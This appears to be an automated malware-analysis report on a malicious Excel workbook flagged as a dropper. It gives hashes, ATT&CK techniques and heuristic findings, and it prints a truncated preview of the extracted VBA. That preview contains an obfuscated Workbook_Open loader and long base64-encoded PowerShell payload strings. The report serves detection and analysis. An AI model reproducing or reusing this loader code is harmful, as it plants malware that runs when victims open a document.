Office (OOXML) malware analysis — malicious · 28d1276f003e19a1

MALICIOUS

Office (OOXML)

20.3 KB Created: 2020-09-01 22:36:17 UTC Authoring application: Microsoft Excel 15.0300 First seen: 2020-09-07

MD5: 72b91211b88bc119e26b37f72c959101 SHA-1: 53a709add9000cbfe0d94bca1603cc65f74e2fde SHA-256: 28d1276f003e19a119304821ad877e6867c7adf37b7d6115ddd8ad6da26caeeb

262 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The file is an Office document containing a Workbook_Open macro, which is a common technique for executing malicious code upon opening. The VBA code is heavily obfuscated and uses CreateObject to execute, indicating it's designed to download and run a second-stage payload. ClamAV detection confirms its malicious nature as a dropper.

Heuristics 7

ClamAV: Doc.Dropper.Agent-9633682-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-9633682-0
VBA project inside OOXML medium 4 related findings OOXML_VBA

Document contains a VBA project — VBA macros present
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER

Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
Workbook_Open macro high OLE_VBA_WBOPEN

Workbook_Open macro
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE

One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source from OOXML)	10198 bytes
SHA-256: `6f2413599b71dcde26fbd7cdd0450f46286847505fc68213271a2a6680719137`
Detection ClamAV: No threats found Obfuscation or payload: likely Carved artifact contains 10 long base64-like blob(s).
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisWorkbook" Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Private Sub workbook_open() Mxd_87ZNSiN_YpNU_T59OeiI.snq24FfOudkbswGvSYTUI8n_FGC End Sub Attribute VB_Name = "Sheet1" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Mxd_87ZNSiN_YpNU_T59OeiI" Sub snq24FfOudkbswGvSYTUI8n_FGC() OL = gfd_12(181) & gfd_12(159) & gfd_12(150) & gfd_12(114) & gfd_12(129) & gfd_12(181) & gfd_12(114) & gfd_12(194) & gfd_12(176) & gfd_12(161) & gfd_12(176) & gfd_12(201) & gfd_12(176) & gfd_12(151) & gfd_12(176) & gfd_12(164) & gfd_12(165) & gfd_12(176) & gfd_12(186) & gfd_12(151) & gfd_12(176) & gfd_12(190) & gfd_12(158) & gfd_12(114) & gfd_12(127) & gfd_12(151) & gfd_12(114) OL = OL & "WwBTAFkAUwB0AGUATQAuAFQARQBYAFQALgBFAE4AQwBvAGQASQBuAGcAXQA6ADoAdQBOAEkAQwBvAEQAZQAuAGcARQBUAFMAdAByAGkATgBHACgAWwBTAHkAUwBUAEUAbQAuAGMAbwBOAFYARQBSAFQAXQA6ADoAZgBSAG8ATQBiAEEAUwBlADYANABzAFQAUgBJAG4ARwAoACIAZABBAEIAeQBBAEgAawBBAGUAdwBCAG0AQQBHADgAQQBjAGcAQQBnAEEAQwBnAEEASgBBAEIAcABBAEQAMABBAE0AUQBBADcAQQBDAEEAQQBKAEEAQgBwAEEAQwBBAEEATABRAEIAcwBBAEcAVQBBAEkAQQBBAHkAQQBEAEEAQQBNAEEAQQB3AEEARABBAEEATwB3AEEAZwBBAEMAUQBBAGEAUQBBAHIAQQBDAHMAQQBLAFEAQQBnAEEASABzAEEASgBBAEIAcABBAEMAdwBBAEkAZwBCAGcAQQBHADQAQQBJAGcAQgA5AEEASAAwAEEARABRAEEASwBBAEcATQBBAFkAUQBCADAAQQBHAE0AQQBhAEEAQgA3AEEASAAwAEEARABRAEEASwBBAEcAWQBBAGQAUQBCAHUAQQBHAE0AQQBkAEEAQgBwAEEARwA4AEEAYgBnAEEAZwBBAEUASQBBAFYAdwBCAEsAQQBHADgAQQBhAEEAQgA0AEEARgBNAEEATgBBAEIAagBBAEUAcwBBAFM" OL = OL & "AUQBCAEUAQQBGAGsAQQBiAGcAQQA0AEEARQBNAEEAZQBnAEIAdwBBAEQAVQBBAFYAdwBCAFIAQQBEAEUAQQBPAEEAQgBIAEEARABFAEEAUgB3AEIAaQBBAEYASQBBAGIAdwBCAFQAQQBIAG8AQQBTAGcAQgBwAEEARABnAEEAVwBRAEIAawBBAEgATQBBAGMAZwBCAFgAQQBHADgAQQBRAFEAQgBTAEEARgA4AEEAWgB3AEIAUwBBAEQAUQBBAFMAdwBCAGYAQQBGAEEAQQBWAGcAQgBxAEEARgA4AEEAWgBRAEIAcwBBAEgAYwBBAFMAZwBCAFkAQQBFAEkAQQBkAGcAQgBhAEEARgBZAEEAWAB3AEIAUABBAEUAawBBAEkAQQBBAG8AQQBDAEEAQQBKAEEAQgBWAEEARABnAEEAWgBRAEIAYQBBAEUANABBAFoAUQBCAFUAQQBFAGcAQQBVAGcAQgBSAEEARgBZAEEATwBBAEIANgBBAEcARQBBAGUAQQBBADMAQQBEAFUAQQBJAEEAQQBzAEEAQwBBAEEASgBBAEIAVwBBAEUASQBBAFUAZwBCADAAQQBFAFUAQQBjAEEAQQAyAEEARQBvAEEAVABRAEIARgBBAEgAQQBBAE4AQQBBADIAQQBGAEUAQQBRAFEAQQBnAEEAQwBrAEEAZQB3AEEAZwBBAEcAawBBAFQAUQBCAHcAQQBFADgAQQBjAGcAQgAwAEEAQwAwAE" OL = OL & "EAVABRAEIAdgBBAEcAUQBBAGQAUQBCAHMAQQBFAFUAQQBJAEEAQgBpAEEARQBrAEEAZABBAEIAVABBAEgAUQBBAGMAZwBCAEIAQQBFADQAQQBjAHcAQgBtAEEARQBVAEEAYwBnAEEANwBBAEEAMABBAEMAZwBCAFQAQQBGAFEAQQBRAFEAQgBTAEEASABRAEEATABRAEIAQwBBAEcAawBBAGQAQQBCAHoAQQBGAFEAQQBVAGcAQgBCAEEARQA0AEEAVQB3AEIAbQBBAEUAVQBBAFUAZwBBAGcAQQBDADAAQQBVAHcAQgBQAEEASABVAEEAYwBnAEIAagBBAEUAVQBBAEkAQQBBAGsAQQBGAFUAQQBPAEEAQgBsAEEARgBvAEEAVABnAEIAbABBAEYAUQBBAFMAQQBCAFMAQQBGAEUAQQBWAGcAQQA0AEEASABvAEEAWQBRAEIANABBAEQAYwBBAE4AUQBBAGcAQQBDADAAQQBaAEEAQgBGAEEARgBNAEEAVgBBAEIASgBBAEUANABBAFkAUQBCADAAQQBFAGsAQQBiAHcAQgB1AEEAQwBBAEEASgBBAEIAVwBBAEUASQBBAFUAZwBCADAAQQBFAFUAQQBjAEEAQQAyAEEARQBvAEEAVABRAEIARgBBAEgAQQBBAE4AQQBBADIAQQBGAEUAQQBRAFEAQQA3AEEAQwBBAEEASgBnAEEAZwBBAEMAUQBBAFYAZwBCAEMAQQBGA" OL = OL & "EkAQQBkAEEAQgBGAEEASABBAEEATgBnAEIASwBBAEUAMABBAFIAUQBCAHcAQQBEAFEAQQBOAGcAQgBSAEEARQBFAEEATwB3AEEAZwBBAEgAMABBAGQAQQBCAHkAQQBIAGsAQQBlAHcAQQBOAEEAQQBvAEEARABRAEEASwBBAEMAUQBBAFQAdwBCAEYAQQBHAG8AQQBRAFEAQgBpAEEARwBZAEEAVwBnAEEAMABBAEYAbwBBAFMAdwBCAFkAQQBHAEkAQQBTAHcAQgBpAEEARgBnAEEAWQBnAEIAbQBBAEYAUQBBAE4AdwBCAHUAQQBEADAAQQBKAEEAQgBGAEEARQA0AEEAZABnAEEANgBBAEgAVQBBAGMAdwBCAGwAQQBIAEkAQQBVAEEAQgBTAEEARQA4AEEAWgBnAEIASgBBAEUAdwBBAFIAUQBBAHIAQQBDAGMAQQBYAEEAQgBOAEEARwBRAEEAZABBAEIAagBBAEQAZwBBAGIAQQBCADAAQQBFADQAQQBXAFEAQgBoAEEARwBFAEEAWQBRAEEANQBBAEMANABBAFoAUQBCADQAQQBHAFUAQQBKAHcAQQA3AEEAQQAwAEEAQwBnAEIAQwBBAEYAYwBBAFMAZwBCAHYAQQBHAGcAQQBlAE ... (truncated)
`vbaProject_00.bin`	vba-project	OOXML VBA project: xl/vbaProject.bin	28672 bytes
SHA-256: `355fa4c7b5c09c87b7bfb823e96086d9cf4d99e0bf846e64388697241eadbdba`
Detection ClamAV: No threats found Obfuscation or payload: likely Carved artifact contains 10 long base64-like blob(s).

Open this report in the interactive analyzer, or submit your own file for analysis.